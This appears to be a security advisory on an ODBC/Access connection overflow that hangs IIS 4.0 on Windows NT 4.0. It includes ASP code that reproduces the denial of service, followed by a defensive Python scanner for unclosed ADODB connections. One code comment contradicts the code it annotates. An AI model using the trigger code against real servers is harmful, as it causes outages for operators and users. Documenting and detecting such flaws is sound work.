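18. MS ODBC database connection overflow causes denial of service on NT/9x
Vulnerability description:
Microsoft ODBC may have a potential overflow problem when connecting to and disconnecting from a database (related to Microsoft Access databases).
If a connection to a second database is opened directly without first closing the existing connection, the service may stop.
Affected systems:
ODBC version: 3.510.3711.0
ODBC Access driver version: 3.51.1029.00
OS version: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386)
Microsoft Office 97 Professional (mso97.dll: 8.0.0.3507)
The vulnerability can be checked for as follows:
ODBC data source name: miscdb
ODBC database type: MS Access
ODBC assumed path: d:\data\misc.mdb
The ASP code is as follows: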
<%
set connvb = server.createobject("adodb.connection")
connvb.open "driver={microsoft access driver (*.mdb)}; dsn=miscdb"
%>
<html>
<body>
…lots of html removed…
<!-- we connect to db1 -->
<%
set connglobal = server.createobject("adodb.connection")
connglobal.open "dsn=miscdb;user=sa"
msql = "arb sql statement"
set rsglobal = connglobal.execute(msql)
while not rsglobal.eof
response.write rsglobal("resultfrommiscdb")
rsglobal.movenext
wend
rsglobal.close
set rsglobal = nothing
connglobal.close
set connglobal = nothing
' note we do not close the connection
%>
<!-- call the same database by means of dbq direct file access -->
<%
set connglobal = server.createobject("adodb.connection")
connglobal.open "driver={microsoft access driver (*.mdb)}; dbq=d:\data\misc.mdb"
msql = "arb sql statement"
set rsglobal = connglobal.execute(msql)
while not rsglobal.eof
response.write rsglobal("resultfrommiscdb")
rsglobal.movenext
wend
rsglobal.close
set rsglobal = nothing
connglobal.close
set connglobal = nothing
' note we do close the connection
%>
In this situation the IIS process stalls, and the inetinfo.exe process drives CPU usage to 100%. Only restarting the computer restores service.
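To find pages with this connection-handling pattern before they reach a server, the following added example (not part of the original advisory) scans ASP source for ADODB connections that are opened while another is still open, or that are never closed. The function name audit_asp_connections and the sample page are hypothetical and constructed for illustration.

```python
import re

# Constructed sample page (not from the advisory): connvb is opened and never
# closed, then a second connection to the same .mdb is opened via DBQ.
SAMPLE = '''<%
set connvb = server.createobject("adodb.connection")
connvb.open "dsn=miscdb"
%>
<html><body>
<%
set connglobal = server.createobject("adodb.connection")
connglobal.open "driver={microsoft access driver (*.mdb)}; dbq=d:\\data\\misc.mdb"
connglobal.close   ' closed correctly
set connglobal = nothing
%>
</body></html>
'''

ASP_BLOCK_RE = re.compile(r'<%(.*?)%>', re.S)
CREATE_RE = re.compile(
    r'set\s+(\w+)\s*=\s*server\.createobject\(\s*"adodb\.connection"\s*\)', re.I)
CALL_RE = re.compile(r'^(\w+)\.(open|close)\b', re.I)


def audit_asp_connections(source):
    """Return (line, variable, reason) for risky ADODB connection handling."""
    conns, open_at, findings = set(), {}, []
    for block in ASP_BLOCK_RE.finditer(source):
        first_line = source.count("\n", 0, block.start(1)) + 1
        for offset, raw in enumerate(block.group(1).split("\n")):
            # Simplification: treat everything after ' as a VBScript comment.
            stmt = raw.split("'", 1)[0].strip()
            lineno = first_line + offset
            created = CREATE_RE.search(stmt)
            if created:
                conns.add(created.group(1).lower())
                continue
            call = CALL_RE.match(stmt)
            if not call or call.group(1).lower() not in conns:
                continue  # e.g. rsglobal.close on a recordset
            name, method = call.group(1).lower(), call.group(2).lower()
            if method == "close":
                open_at.pop(name, None)
                continue
            for other, where in open_at.items():
                if other != name:
                    findings.append((lineno, name,
                        f"opened while {other} (line {where}) is still open"))
            open_at[name] = lineno
    findings += [(w, n, "opened but never closed") for n, w in open_at.items()]
    return findings
```

Each finding gives the source line, the connection variable and the reason, so the page can be corrected to close the first connection before another is opened.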
